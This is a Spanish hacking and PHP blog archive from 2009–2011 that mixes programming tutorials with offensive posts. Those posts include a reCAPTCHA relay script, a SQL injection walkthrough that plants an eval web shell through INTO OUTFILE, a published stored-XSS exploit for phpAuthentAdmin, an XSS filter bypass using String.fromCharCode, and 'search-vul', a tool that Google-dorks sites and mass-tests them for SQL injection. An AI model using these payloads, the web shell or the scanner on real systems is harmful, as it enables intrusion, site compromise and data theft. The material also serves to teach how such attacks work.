Yoyahack

Diseño nuevo y blog nuevo

2011-10-08T16:04:00.000-07:00

Buenas, he diseñado un nuevo diseño para el Blog. Es un Diseño limpio y formal, mi objetivo es que el blog sea mucho mas amplio y mas legible.

Le deje todo el espacio a los artículos, la columna la pase al footer, así tendré mucho mas espacio.

Aquí una captura.

Estaba pensando en hacer el diseño para blogger desde un principio pero no me gusto para nada la forma de diseñar diseños para blogger.

El diseño sera un diseño para un blog de Wordpress, así que habrá un dominio nuevo. A la larga sera un poco mejor, ya que podre dejar ejemplos online para que puedan probar, agregar plugin. Osea, tendre mucho mas control de todo, cosa que no pasaba en blogger.

De momento no he terminado 100% el diseño, aunque ya gran parte del diseño esta adaptado a Wordpress. Seguiré trabajando en el.

Saludos.

Bypass Recaptcha y cualquier otra

2011-09-07T07:18:00.000-07:00

Muchas veces necesitamos hacerle un bypass a alguna captcha, como puede ser Re-captcha.

Lo primero que se nos ocurre es usar algun OCR (Reconocimiento óptico de caracteres) para detectar las letras de la imágenes. El problema esta que no puede funcionar correctamente y en muchos casos no logra procesar la imagen. Quizás por eso no sea algo muy típico, ni muy utilizado con esto fines.

Podemos desarrollar nuestro propio OCR, pero a la larga seria un proceso muy complejo y necesitaríamos invertirle mucho tiempo. Muchos simplemente descartan el proyecto.

Otros lo que harían seria buscar alguna vulnerabilidad en la captcha, que de alguna forma les permita saber que imagen es y que letras tienen. Algunos buscarían una vulnerabilidad en la validación de la captcha que seria un proceso igualmente largo ya que tienen que entender el funcionamiento de la captcha y comenzar a probar...

Yo estaba realizando una App web y debía realizar acciones y tomar algunos datos de un sitio web, pero este utilizaba Re-captcha para poder identificarse/loguearse. Se me ocurrieron todas las opciones que menciones y otras pero no relacionada directamente con la captcha.

Aquí tengo una solución universal para cualquier Captcha. La solución mas rápida y segura, es utilizar la misma captcha que el sitio web.

Osea, la imagen genera la captcha la capturo y la muestro en mi sitio web para que los usuarios que vayan a utilizar la App web, inserten el código de la captcha y mi App web realice todo.

Al final tengo una App web, que realiza lo que quería hacer y utiliza captcha. No tengo que implementar alguna captcha en mi servicio ya que con la captcha del sitio web me basta.

Bypass de Re-Captcha

El source de ejemplo

<?php
require_once('recaptchalib.php');


$publickey = "6Lc55McSAAAAAChEOICK8IX0V6zRh3CD64ix6jbx";
$privatekey = "6Lc55McSAAAAAB4ny39PlgX8gjMvm2x7SsrXEb6y";

if(!empty($_POST['nombre'])) {

	$is_valid = recaptcha_check_answer($privatekey, $_SERVER["REMOTE_ADDR"], $_POST["recaptcha_challenge_field"], $_POST["recaptcha_response_field"]);


	if($is_valid->is_valid) {
		echo '<p><h1>Captcha Valida</h1></p>';
		exit;
	}else{
		echo '<p><h1>Captcha invalida</h1></p>';
	}
}



?>

<form method="POST" name="form" action="coment.php">
	<p>Mensaje: <br><input type="text" name="nombre"></p>
   <?php echo recaptcha_get_html($publickey); ?><br>
	<input type="submit" value="enviar">
</form>

Realizare el código para hacerle el bypass.

<?php



//Si se envio el formulario, compruebo el el input

//donde se inserte la captcha, contenga algun valor

if(!empty($_POST['captcha_valude'])) {



$data =' nombre='.$_POST['mensaje'].'&recaptcha_challenge_field='.$_POST['cod'].'&recaptcha_response_field='.urlencode($_POST['captcha_valude']);

echo post('http://127.0.0.1/a.php', $data);

}

//Fin del poc para el bypass



//Obtengo la imagen de la captcha y luego la muestro....

$contenido = get('http://127.0.0.1/a.php');

preg_match('/ipt" src="(h[^"]+)/', $contenido, $result);

preg_match('/challenge :[sn]+'([^']+)/i', get($result[1]), $cont);

$img = 'http://www.google.com/recaptcha/api/image?c='.$cont[1];

echo '<IMG src="'.$img.'">';

//Fin...



//Funcion para realizar peticiones GET

function get($url) {

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$result = curl_exec($ch);

curl_close($ch);

return $result;

}



//Funcion para realizar peticiones POST

function post($url, $contenido) {

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt ($ch, CURLOPT_POST, 1);

curl_setopt ($ch, CURLOPT_POSTFIELDS, $contenido);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$result = curl_exec ($ch);

curl_close ($ch);



return $result;

}



?>



<!--Formulario-->

<form action="aa.php" method="POST">

<p>Inserte el contenido de la captcha</p>

<p><input type="text" name="captcha_valude"></p>

<p>Inserte el mensaje <br><input type="text" name="mensaje"></p>

<input type="hidden" name="cod" value="<?php echo $cont[1]; ?>"><!--Codigo de la captcha-->

<input type="submit" value="Enviar">

</form>

Al rellenar todos los datos correctamente, me da por valida todo.

Probar el PoC, así entienden mejor todo.

Saludos.

File Path Injection - PHP <= 5.3.6

2011-08-21T08:47:00.000-07:00

Buenas, al parecer hay una vulnerabilidad en el Core de PHP que permiten a los atacante modificar archivos de la raíz mediante la subida de archivo en PHP (PHP Upload).

La vulnerabilidad esta en que PHP permite que el nombre del archivo pueda comenzar con barra simple (/) o una barra invertida (\). Por lo tanto esto permite ingresar a la Raiz del sistema y modificar archivos.

Hay que tener en cuenta que es necesario tener los permiso necesarios para poder editar archivos de la raíz...

El bug fue solucionado en la versión 5.3.7 de PHP.

Saludos.

Utilizar fuentes de Google font en Blogger

2011-06-05T12:29:00.001-07:00

Buenas, muchas veces queremos implementar las fuentes de Google Font en nuestro Blog de blogger.

Primero que nada entramos en la la Pagina Google Font, luego seleccionamos una fuente y nos movemos hacia la pestaña Use this font.

Un poco mas abajo, nos da la direccion donde se encuentra el archivo css, lo tenemos que copiar y pegarlo despues de las etiquetas <head>.

Luego mas abajo nos da un ejemplo de como implementar la fuente, en este caso en el tang <h1>.

Pueden colocarlo en el selector .posttitle, .entry, etc...

Saludos.

Creando aplicación que se conecte a una web y inicie session

2011-03-14T12:55:00.000-07:00

Buenas, aveces necesitamos crear nuestra aplicaciones que se conecten a una web o varias Webs, para recolectar información o enviar información, quizás para recolectar y enviar información. Algunas paginas nos facilitan este trabajo creando una Api para su sitio web, un ejemplo puede ser Pastebin, Flickr, Imageshack, Twitter, etc...

Aveces no es el caso y debemos realizar todo manualmente.

Bueno primero que nada debemos examinar la web. Debemos tener en cuenta:

Los parámetros necesarios a mandar a la web.
El código de repuesta de la pagina, para poder tomar decisiones.
Los datos que nos envían la pagina, como Cookies.

Algo muy importante que debemos tener en cuenta, es organizar nuestras ideas antes de comenzar. Cual es el objetivo de nuestra aplicación, los pasos necesarios para poder realizar lo, etc...

Index.php:

En este caso, mi objetivo es loguearme (Iniciar session) en una web y aparecer como logueado.

Primero trato de loguearme con datos falsos, para ver como responde la pagina.

Miro los headers:

Me logueo de nuevo, pero esta vez con los datos verdaderos:

Miro los dos headers y busco una diferencia, para diferenciar si me he logueado correctamente o falso, así para luego tomar decisiones en mi aplicación.

Puedo ver que cuando inicie session con mis datos correcto, el código de respuesta fue 302 y cuando ingrese datos falso el código de repuesta fue 200. También que al iniciar session correctamente, el servidor me manda una Cookie que es PHPSESSID.

Al iniciar session correctamente, me redirecciona al index.php

Paso a crear mi aplicación, que realizara lo siguiente:

Enviar una petición POST al archivo login.php, con la query usuario que contendrá el nombre de usuario y la query password que contendrá el password.

Luego verifico que los datos sean correctos, si el código de repuesta es 302 es porque los datos han sido correcto y si el código de repuesta es 200 es porque los datos introducidos han sido falso. Si los datos han sido correcto, capturo la Cookie que manda el servidor para luego usarla en las peticiones GET o POST.

Bueno aquí la un ejemplo de un pequeño script escrito en Perl

#!/usr/bin/perl -w

use strict;

#Modulos necesarios
use LWP::UserAgent;
use HTTP::Request::Common;

my $url_login = 'http://127.0.0.1/pruebas/login.php';

my $usuario  = $ARGV[0];

my $password = $ARGV[1];

my $ua = new LWP::UserAgent;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16");

my $response = $ua->request(
POST $url_login, #Realizo la peticion POST
{
usuario => $usuario,#Le asigno el valor de la variable $usuario a la query usuario
password => $password,#Le asigno el valor de la variable $password a la query password
});


#Verificos que los datos ingresados sean correcto
#para esto verifico que en el codigo de repuesta
#sea 302

if($response->status_line =~ /302/)
{
print "Datos correctosn";
print "Cookie mandada por el servidor -> ".$response->header('set-cookie')."n";
exit;#Finalizo el script
}

#Si ah llegado hasta aqui, es porque los datos no son verdaderos

Salida:

Otro ejemplo pero usando PHP

<?php

$url_login = 'http://127.0.0.1/pruebas/login.php';
$usuario  = 'yoya';//Usuario
$password = 'admin';//Password

$ch = curl_init();
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16');
curl_setopt($ch, CURLOPT_URL, $url_login);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_POST, true);
curl_setopt($ch,CURLOPT_HEADER,true);

/*
Le asigno el valor de la variable $usuario a la query usuario
Le asigno el valor de la variable $password a la query password
*/
curl_setopt ($ch, CURLOPT_POSTFIELDS, "usuario=".$usuario."&"."password=".$password);
$result = curl_exec($ch);


/*Verificos que los datos ingresados sean correcto
para esto verifico que en el codigo de repuesta
sea 302*/

if(curl_getinfo($ch, CURLINFO_HTTP_CODE) == "302")
{
preg_match("/Set-Cookie:s*([w=]+)[s;n]*/i", $result, $cookie_valor);

echo "Datos correctos<br>";
echo "Cookie mandada por el servidor -> ".$cookie_valor[1]."<br>";
exit;
}

echo "Datos introducidos incorrecto<br>";
exit;

?>

Salida:

Source para practicar:

<?php
session_start();

if(!empty($_POST['usuario']) && !empty($_POST['password']))
{
 $usuario  = $_POST['usuario'];
 $password = $_POST['password'];

 if($usuario == 'yoya' && $password == 'admin')
 {
    $_SESSION['conectado'] = 1;
    header('Location: index.php');
 }

}

?>

<p><h1>Ingresar</h1></p>

<form name="login" method="POST" action="login.php">
<p>Usuario:<br><input type="text" name="usuario"></p>

<p>Password:<br><input type="password" name="password"></p>

<p><input type="submit" value="Enviar"></p>

</form>

Saludos.

Manejo de excepciones en PHP

2011-03-10T14:29:00.000-08:00

Buenas, aunque no es muy usado el manejo de excepciones en PHP, tenemos la opción de poder utilizarlo.

Bueno aquí un ejemplo:

<?php

function saludo($str = null)//Funcion saludo
{//Inicio

 if(empty($str))//Si la variable $str esta vacia entonce
 {
    throw new Exception('Ingresar un parametro');//Lanzamos la excepción

 }//Fin del if

 elseif(is_int($str))//Si la variable $str contiene solo numeros enteros
 {                   //Entonces ....
 throw new Exception('No se permite numeros enteros');
 }//Fin del elseif

 else{ //Sino
 return $str;
 }//Fin del else
}//Fin de la funcion


try{
 saludo("Hola mundo\n");
 saludo(2);

} catch (Exception $e) {
 echo $e->getMessage();//Mostramo el mensaje de la excepcion
 print_r($e);
}
?>

Bueno, tenemos la función saludo() que recibe un parámetro, si no le mandamos un parámetro a la función saludo(), esta función lanza una excepción .

Si le mandamos solo números enteros como parámetros a la función saludo(), esta lanza una excepción.

Si todo esta bien, la función saludo() retorna el valor de la variable $str que es la variable que contiene el valor que le pasamos como parámetro a la función saludo().

Salida:

Hola mundo
Exception Object
(
   [message:protected] => No se permite numeros enteros
   [string:Exception:private] =>
   [code:protected] => 0
   [file:protected] => /var/www/html/pruebas.php
   [line:protected] => 14
   [trace:Exception:private] => Array
       (
           [0] => Array
               (
                   [file] => /var/www/html/pruebas.php
                   [line] => 25
                   [function] => saludo
                   [args] => Array
                       (
                           [0] => 2
                       )

               )

       )

   [previous:Exception:private] =>
)

Saludos.

Explicación de INTO OUTFILE en una Inyección SQL

2010-10-31T20:07:00.001-07:00

Buenas, muchas veces la personas no saben usar correctamente o no saben como funciona el comando INTO OUTFILE en MYSQL...

Bueno tengo este código PHP vulnerable


<?php
$link = mysql_connect('127.0.0.1','root', 'pass');
mysql_select_db('ejemplo', $link);

$sql = mysql_query('select * from ejemplo where id='.$_GET['id'], $link);
if(mysql_errno($link))
{
echo mysql_error($link);
exit;
}

while($row = mysql_fetch_assoc($sql))
{
echo $row['id']."<br>".$row['titulo']."<br>".$row['contenido']."<br>".$row['parent'];
}
?>

La estructura de la tabla ejemplo, es la siguiente:

mysql> describe ejemplo;
+-----------+-----------+------+-----+---------+----------------+
| Field     | Type      | Null | Key | Default | Extra          |
+-----------+-----------+------+-----+---------+----------------+
| id        | int(11)   | NO   | PRI | NULL    | auto_increment |
| titulo    | char(20)  | NO   |     | NULL    |                |
| contenido | char(255) | NO   |     | NULL    |                |
| parent    | char(50)  | NO   |     | NULL    |                |
+-----------+-----------+------+-----+---------+----------------+
4 rows in set (0.00 sec)

Bueno el código PHP es vulnerable ya que no filtra correctamente el input id que se envía vía GET y por lo tanto podemos manipular la consulta SQL.

El siguiente paso seria saber el user y el host de la conexión MYSQL que se esta usando, podemos usar el comando user()... Para esto vamos a usar el comando UNION ALL, para combinar las consultas, teniendo en cuenta que debemos tener el mismo numero de columna que el SELECT anterior. Bueno como el primer SELECT hace la consulta a todos los campos de la Tabla ejemplo y la tabla ejemplo tiene 4 columnas, pasaremos a hacer la consulta SQL:

mysql> select * from ejemplo where id=1 union all select 1,2,3,4;
+----+---------+--------------------+--------+
| id | titulo  | contenido          | parent |
+----+---------+--------------------+--------+
|  1 | saludar | Ejemplo de saludar | -      |
|  1 | 2       | 3                  | 4      |
+----+---------+--------------------+--------+

La petición GET:

http://127.0.0.1/pruebas.php?id=2 union all select 1,2,3,4

Bueno usamos user() para saber el actual usuario y el host.

mysql> select * from ejemplo where id=1 union all select user(),2,3,4;
+----------------+---------+--------------------+--------+
| id             | titulo  | contenido          | parent |
+----------------+---------+--------------------+--------+
| 1              | saludar | Ejemplo de saludar | -      |
| root@localhost | 2       | 3                  | 4      |
+----------------+---------+--------------------+--------+

La petición GET:

http://127.0.0.1/pruebas.php?id=2 union all select user(),2,3,4

Salida: root@localhost

Bueno ahora nos toca saber si el usuario el usuario tienes permiso FILE.

Nota: El permiso FILE permite al usuario usar los comandos into outfile y load_file().


mysql> select * from ejemplo where id=1 union all select user,host,3,4 from mysql.user where File_priv = 'Y' && user='root' && host='localhost';
+--------------------------------------------------+-----------+--------------------+--------+
| id                                               | titulo    | contenido          | parent |
+--------------------------------------------------+-----------+--------------------+--------+
| 1                                                | saludar   | Ejemplo de saludar | -      |
| root                                             | localhost | 3                  | 4      |
+--------------------------------------------------+-----------+--------------------+--------+

La petición GET:

http://127.0.0.1/pruebas.php?id=2 union all select user,host,3,4 from mysql.user where File_priv = 'Y' && user='root' && host='localhost';

salida: rootlocalhost

Bueno como el usuario tiene permiso FILE podemos usar el comando load_file() y into outfile. El primer paso para seria saber el DocumentRoot que es donde se encuentran los documentos web, para saber la direccion del DocumentRoot podemos trata de probocar un Full Path Disclosure (FPD), leer el archivo de configuración de Apache usando load_file...

Mi DocumentRoot se encuentra en /var/www/html. Debemos tener en cuenta que para utilizar into outfile la directiva Magic_quotes_gpc del php no este activada, esta directiva escapa las comillas simples y dobles que viajan vía GET, POST y como COOKIE y que el directorio tenga permiso de escritura. Debemos indicar donde queremos guardar el archivo cuando usamos el comando INTO OUTFILE.

Bueno realizare la siguiente petición GET:

http://127.0.0.1/pruebas.php?id=2 union all select "<?php @eval($_GET['exec']); ?>",2,3,4 into outfile "/var/www/html/exec.php"

Bueno, ahora pasamos a ejecutar el archivo exec.php pasando la query exec para que se ejecute la función eval.

Luego ejecutamos el archivo exec.php pasandole el valor a la query exec phpinfo(), que nos sirve para mostrarnos la configuración de PHP.

http://127.0.0.1/exec.php?exec=phpinfo();

Saludos.

Passive Group - Expresiones Regulares

2010-10-30T07:41:00.000-07:00

Buenas, los Passive Group se usan para no crear una referencia... Si tengo el siguiente patrón

<?php
preg_match('/(hola)/','hola', $salida);
echo $salida[1];
?>

La salida es hola, el primer paréntesis crea la primera referencia, si existe otro paréntesis creara una segunda referencia, etc... Si usamos Passive Group este no creara una referencia...

<?php
preg_match('/(?:h)(ola)/','hola', $salida);
echo $salida[1];
?>

La salida es ola, en el primer paréntesis uso el Passive Group para no crear una referencia pero en el segundo creo una referencia que seria la primera referencia...

Saludos.

[PHP Class] HttpLoginConnect

2010-09-01T16:59:00.000-07:00

HttpLoginConnect

HttpLoginConnect es una clase hecha en PHP, especialmente preparada para la validación de datos de un login...

Descripción: HttpLoginConnect valida los datos de un login, verifica que la validación de datos sea correcta y captura la cookie que mandar el servidor, para su posterior uso... Se puede realizar peticiones GET al servidor usando la cookie capturada.

Característica:

Validación de datos
Uso de Cookie
Permite enviar peticiones GET con el uso de cookie
Permite parámetros opcionales para enviarlo via POST

Requerimientos:
Apache
PHP5
PHP-Curl
Documentacion
Source

Saludos.

Mysql Connection Hijacking

2010-08-08T09:14:00.000-07:00

Buenas, hace poco estaba leyendo un White-paper, que mostraba la importancia de la función mysql_close(), que sirve para cerrar conexiones mysql no-persistente, algunas personas no lo usan ya que la conexión se cierra al final del script, otras personas no le dan importancia...

Bueno para entender como funciona, que mejor que un ejemplo:

Este es el código vulnerable:


<?php
$connect = mysql_connect('127.0.0.1','root','password');
mysql_select_db('ejemplo',$connect);

if(mysql_query('select * from nombres where id=1;')){
echo "Consulta ejecutada";
}else{
echo "No se pudo ejecutar la consulta<br><br>";
}
if(isset($_GET['v']))
{
eval($_GET['v']);
}


?>

En este caso como no se ah cerrado la conexión mysql no-persistente y tampoco ah finalisado el script puedo hacer uso de la conexión mysql...


http://127.0.0.1/script.php?v=$sql = mysql_query('select * from nombres');while ($row = mysql_fetch_assoc($sql)){ echo "<br>".$row['nombre'];}

Salida:


Consulta ejecutada
edwin
jose
jesus

Saludos.

Referencias:
Hijacking
MySQL

¿empty o isset?

2010-06-17T16:39:00.000-07:00

Buenas, aveces tenemos que verificar el contenido de una variable pero mucha veces usamos isset o empty para verificar pero son muy diferente las dos...

Basta con preguntarse porque en php existiría una función con diferente nombre pero con el mismo resultado....

Ps la correcta forma para verificar si una variable esta vacía es empty ya que determina si una variable esta vacía... isset se usa para saber si una variable esta definida...

Saludos....

Capturacion global con Expresiones Regulares en Perl y PHP

2010-04-11T09:37:00.000-07:00

Buenas, aveces necesitamos hacer una captura global con expresiones regulares, ya que cuando encuentra el primer patron hay termina la expresion termina...

Aunque en Perl nunca tuve ese problema en PHP, así que muestro la manera de hacerlo con PHP y Perl.

Perl

En Perl necesito usar el operador de opción g mas una sentencia infinita, en este caso while...


#!/usr/bin/perl -w

$txt = "Hola adios Hola aqwq ds iifndini Hola";

while($txt =~ m/(Hola+)/g){

print $1, "\n";

}

exit;

Salida:


yoya@yoya-desktop:~/Escritorio$ perl d.pl
Hola
Hola
Hola

PHP

En PHP necesito usar la función preg_match_all.


<?php

$txt = "Hola adios Hola aqwq ds iifndini Hola";
preg_match_all("/(Hola+)/", $txt, $captura, PREG_SET_ORDER);
foreach ($captura as $salida){
echo $salida[1];
echo "\n";
}


?>

Salida:


yoya@yoya-desktop:~/Escritorio$ php  a.php
Hola
Hola
Hola

Referencias:
Expresiones Regulares

phpAuthentAdmin 0.2.1 permanent XSS

2010-04-03T21:26:00.001-07:00

Bueno hace poco publique un exploit en security focus, para insetar un código javascript permanente...


#!/usr/bin/perl
#Autor: Yoyahack
#Web: http://undersecurity.net
#Gretz: OzX, p0fk, S[e]C, ksha, seth, champloo, SH4V....

use LWP::UserAgent;
use HTTP::Request::Common;

#Source

print q(---------------------------------
Autor: Yoyahack
Web: http://undersecurity.net
Gretz: OzX, p0fk, S[e]C, ksha, seth, champloo, SH4V....
---------------------------------
);

if(!$ARGV[0]){
print "Insert web\n";
print "Ex: www.webpage.comhttp://www.webpage.com\n";
exit;
}

$xss = qq();
my $ua = new LWP::UserAgent;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.2.2pre)".
"Gecko/20100308 Ubuntu/9.10 (karmic) Namoroka/3.6.2pre");

$response = $ua->request(
POST "http://$ARGV[0]/phpauthent/phpauthentadmin/useradd.php?action=create",
{
action => 'changerealname',
name => $xss,
action => 'rename',
login => 'aaa',
action=> 'password',
password => 'XSS',
action => 'changeemail',
email => 'XSS',
},
'Cookie' => 'PHPSESSID=cf1c170aa9d334d6cec1514e721573e6',
);
$loc = 'index.php?msg=001';
if($loc eq $response->header('location')){
print "\n\nExploit send!\n";
exit;
}
print "\n\nExploit Faield\n";

Referencias:
Info security focus

Bypass de magic_quotes_gpc() para explotar XSS via POST

2010-02-15T11:12:00.000-08:00

Buenas, algunas veces necesitamos explotar un XSS via GET o via POST, pero nos no dejas porque al parecer tienen ON la directiva magic_quotes_gpc (Get, Post, Cookie), que nos escapa las comillas dobles y simples a barras invertidas, esto puede ser un problema al principio pero esto se puede bypassear con la función String.fromCharCode(), ahora sito el texto:

Este es un método global del objeto String que crea una cadena a partir de los
códigos Unicode  que se le pasen como parámetros.

Bueno, para resumir, para poder explotar las magic_quotes_gpc, solo es necesario insertar un código javascript que no contenga comillas dobles y simples, para esto nos ayudara la función de javascript String.fromCharCode().

Bueno, primero debo saber si tengo la directiva On en el php.ini

root@yoya-desktop:/# cat /etc/php5/apache2/php.ini|grep magic_quotes_gpc
magic_quotes_gpc = On

Con esto ya sabemos que tenemos la directiva magic_quotes_gpc On.

Nota: Apartir de PHP 5.3.0 la directiva magic_quotes_gpc viene por defecto Off y apartir de la versión 6 de PHP sera eliminada.

Explotaremos el siguiente archivo:


<?php
/*Archivo proc.php*/
/*Explotando XSS con magic_quote_gpc ON*/

$var = $_POST['form1'];
$var2 = $_POST['form2'];

if(!empty($var) && !empty($var2))
{
echo "El primer valor es: ", $var;
echo "<br>";
echo "El segundo valor es: ", $var2;
exit;
}
?>
<form name="Formulario" action="proc.php" method="POST">
<p>Ingrese el primer parametro</p>
<input name="form1" type="txt" size="30">
<p>Ingrese el Segundo parametro</p>
<input name="form2" type="txt" size="30">
<br>
<input type="submit" value="Enviar">
</form>

Ok, luego presionamos enviar y aparecerá lo siguiente:


El primer valor es: \"Probando \"comillas dobles\"
El segundo valor es: \'Probando comillas simples\'

Podemos ver que nos a escapado las comillas dobles y simple con barras invertidas,
ok, si ponemos en el formulario, ok ahora usaremos la funcion String.fromCharCode() para pasar los parámetros necesario para ejecutar XSS pero lo tendremos que pasar en ascii, tengo hice una herramienta en perl para su uso.


#!/usr/bin/perl
#Code by Yoyahack
#yoyahack.blogspot.com
#Undersecurity.net

if(!$ARGV[0]){
print "Usage perl $0 <text>\n";
print "Ex: perl $0 yoyahack\n";
exit;
}
print "La cadena convertida a ASCII es:\n";
print join ',', unpack "U*", $ARGV[0];
print "\n";
exit;

Ok, la vamos a pasar y vamos a pasar el siguiente parametro a la tool en perl:


<script>alert("Buenas, esto es un ejemplo")</script>

Y nos devolverá:


60,115,99,114,105,112,116,62,97,108,101,114,116,40,34,66,117,101,110,97,115,44,32,101,115,116,111,32,101,115,32,117,110,32,101,106,101,109,112,108,111,34,41,60,47,115,99,114,105,112,116,62

Ok ahora insertamos lo siguiente en el formulario:


<script>document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,34,66,117,101,110,97,115,44,32,101,115,116,111,32,101,115,32,117,110,32,101,106,101,109,112,108,111,34,41,60,47,115,99,114,105,112,116,62))</script>

Y el resultado:

Bueno, esto era todo...

Saludos.

Ejemplo de PHP POO ( Programación orientada a objectos)

2010-02-14T14:09:00.000-08:00

Ejemplo de PHP POO (Programación orientada a objectos), para que vean mas o menos como funciona xD.


<?php

class info {
 private $nombre;
 private $apellido;
 private $edad;

public function __construct($nom,$lname, $age)
 {
    $this->nombre = $nom;
    $this->apellido = $lname;
    $this->edad = $age;
 }
 
public function nombree()
 {
    echo "El nombre es ".$this->nombre;
    echo '<br>';
 }
 
public function apellidoo()
 {
    echo "El apellido es ".$this->apellido;
    echo '<br>';
 }
 
public function edadd()
 {
    echo "La edad de ".$this->nombre." es ".$this->edad;
    echo '<br>';
 } 
 
public function mostrar()
 {
    echo $this->nombree();
    echo $this->apellidoo();
    echo $this->edadd();
 
 }
 
}//Fin de la clase
 
$info = new info('Yoya','hack', '99');
$info->mostrar();
 
?>

search-vul 0.4

2010-02-14T13:52:00.000-08:00

Bueno aquí mi tool, search-vul 0.4, con algunas optimaciones, arreglos, y detecta si existen varios Query_String en la url y un help para su uso xD.


=pod
Autor:   Yoyahack
name:    search-vul
verion:  0.4
Mail:    yoyahack@undersecurity.net
Web:     www.yoyahack.blogspot.com
Webs:    www.undersecurity.net & www.mitm.cl & elhacker.net & www.n3t-datagrams.net
Gretz:   S[e]C, seth, p0fk, ksha, OzX, protos, NorK, C1c4Tr1Z, [[kt0sh]],SH4V , x4cks
                      _                      _
___  ___  __ _ _ __ ___| |__      __   ___   _| |
/ __|/ _ \/ _` | '__/ __| '_ \ ____\ \ / / | | | |
\__ \  __/ (_| | | | (__| | | |_____\ V /| |_| | |
|___/\___|\__,_|_|  \___|_| |_|      \_/  \__,_|_|

=cut

#opciones
=pod
--google <busqueda> --num <numero> -> Buscar paginas de google.com y indica el numero de pagina a buscar
--googles <busqueda> --num <numero> -> Buscar pagina de distinto servidores googles
--vul <file.txt> -> Escanea un archivo que contenga distinta pagina y verifica las vurnerables
--dns <site> -> Reverse dns
=cut

#Modulos

use LWP::UserAgent;
use HTTP::Request;
use Getopt::Long;

#Code

print q(
·············································
              Code
               by
            Yoyahack
      www.yoyahack.blogspot.com
  www.undersecurity.net & www.mitm.cl
·············································
);

print "Usage: perl $0 --opcion <xxx>\n";
print q(
--google <busqueda> --num <numero>
--googles <busqueda> --num <numero>
--vul <file.txt>
--dns <site>
--help
);

#Opciones
GetOptions("google=s" => \$google,
        "googles=s" => \$googles,
        "vul=s" => \$vul,             
        "dns=s" => \$dns,
        "num=s" => \$num,
        "help" => \$help);

if($google & $num){&google};
if($googles & $num ){&googles};
if($vul){&vul};
if($dns){&dns};
if($help){&help}

sub google{

###########################################################
my $peti = "http://www.google.com/search?hl=&q=$google&start=$num";
my $result = get($peti);

###########################################################
 while ($result =~ m/<h3 class=.*?<a href="([^"]+).*?>(.*?)<\/a>/g) {

     my $enlace = $1;
     open (SE,">>busqueda.txt");
     print SE "$enlace\n";
     close (SE);
     print "$enlace\n";
                                                                 }
        }



sub googles{

###########################################################
my @googles = qw(www.google.es www.google.cl www.google.com.ar www.google.co.ve);
foreach $go(@googles)
            {
             chomp($go);
###########################################################
my $peti1 = "http://$go/search?hl=&q=$googles&start=$num";
my $result1 = get($peti1);

###########################################################
 while ($result1 =~ m/<h3 class=.*?<a href="([^"]+).*?>(.*?)<\/a>/g) {
 my $enlace1 = $1;

 open (SS,">>googles.txt");
 print SS "$enlace1\n";
 close (SS);
 print "$enlace1\n";
                                                                    }
           }
        }


sub vul{
###########################################################
open(PAG,$vul) || die "Archivo de texto no encontrado";
@urls=<PAG>;
close (PAG);
foreach $pag(@urls)
            {
            chomp($pag);
###########################################################
my $iny1 = $pag."'+and+1=1+--+";
my $iny2 = $pag."'+and+1=2+--+";
###########################################################
$pag .= '&';
if($pag =~ m/&{2}/ig){
}else{
   while ($pag =~ m/\&/g) {
         $regex = $pag;
         substr($regex, pos($pag)-1, 0, "+and+1=1+--+");
         my $tofo3  = scalar(split("\n",get($regex)));
         $regex2 = $pag;
         substr($regex2, pos($pag)-1, 0, "+and+1=2+--+");
         my $tofo4  = scalar(split("\n",get($regex2)));
         if($tofo3 ne $tofo4 || $tofo != $todo){
             open (VUL,">>vurl.txt");
             print VUL "$pag\n";
             close (SS);
                                               }
                          }
                }   
##########################################################
my $fuente = get($iny1);
my $tofo  = scalar(split("\n",$fuente));

my $result = get($iny2);
my $todo  = scalar(split("\n",$result));
##########################################################
if($tofo ne $todo || $tofo != $todo){
 open (VUL,">>vurl.txt");
 print VUL q(
·············································
              Code
               by
            Yoyahack
      www.yoyahack.blogspot.com
  www.undersecurity.net & www.mitm.cl
·············································

);
 print VUL "$pag\n";
 close (SS);
 print "[+]$pag es vurnerable a SQLI\n";
 print "!guardada exitosamente\n";
} else {
          print "\n$pag no es vurnerable a SQLI\n";
      }
       }            
            }

sub dns{
my $result = get("http://www.ip-adress.com/reverse_ip/$dns");

while ($result =~ m!<a href="/whois/(.+)">Whois</a>!ig){

 open (DNS,">>reverse_dns.txt");
 print DNS "$1\n";
 close (DNS);
 print "$1\n";

}
if ($result =~ /valid IP address/) {

 print "Not found\n";
}
}


sub help {
&erase;
print q(
##############################
1 --google <busqueda> --num <numero>

Buscar paginas de google.com y indica el numero de pagina a buscar
perl script.pl --google ola --num 10
##############################
#////
##############################
2 --googles <busqueda> --num <numero>

perl script.pl --googles ola --num 10
Buscar pagina de distinto servidores googles
##############################
#////
##############################
3 --vul <file.txt>

perl script.pl --vul archivo.txt
Escanea un archivo que contenga distinta pagina y verifica las vurnerables
##############################
#////
##############################
4 --dns <site>

perl script.pl --dns www.pagina.com
Reverse dns
##############################
#////
);
}

sub erase{
$os = "$^O";
if ("linux" == "$os"){
return system('clear');
 }else{
return system('cls');}
}

sub get {
 my $pagina = $_[0];

 my $ua = new LWP::UserAgent;
 $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");

 my $busqueda = new HTTP::Request GET => $pagina;
 my $resultado = $ua->request($busqueda);
 $ua->timeout(7) || die "Conecction faield";
 my $result = $resultado->content();
}

[optimisada] search-vul 0.3

2009-11-25T13:26:00.000-08:00

Buenas aquí la versión 0.3 de search-vul, la eh optimizado bastante, gracias a C1c4Tr1Z por la idea que me dio para no estar haciendo peticiones a cada rato que hase el script vaya un poco mas lento, y al maestro OzX , eh puesto algunas de sus grandiosas tecnicas en sql....


=pod
Autor:   Yoyahack
name:    search-vul
verion:  0.3
Mail:    yoyahack@undersecurity.net
